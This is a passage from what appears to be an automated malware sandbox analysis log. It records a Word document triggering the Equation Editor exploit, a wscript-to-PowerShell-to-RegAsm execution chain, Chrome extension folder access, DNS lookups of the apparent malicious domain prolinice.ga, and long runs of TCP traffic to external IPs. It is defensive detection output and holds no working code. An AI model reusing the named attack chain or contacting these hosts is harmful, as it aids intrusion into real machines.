            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: ia803104.us.archive.org
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
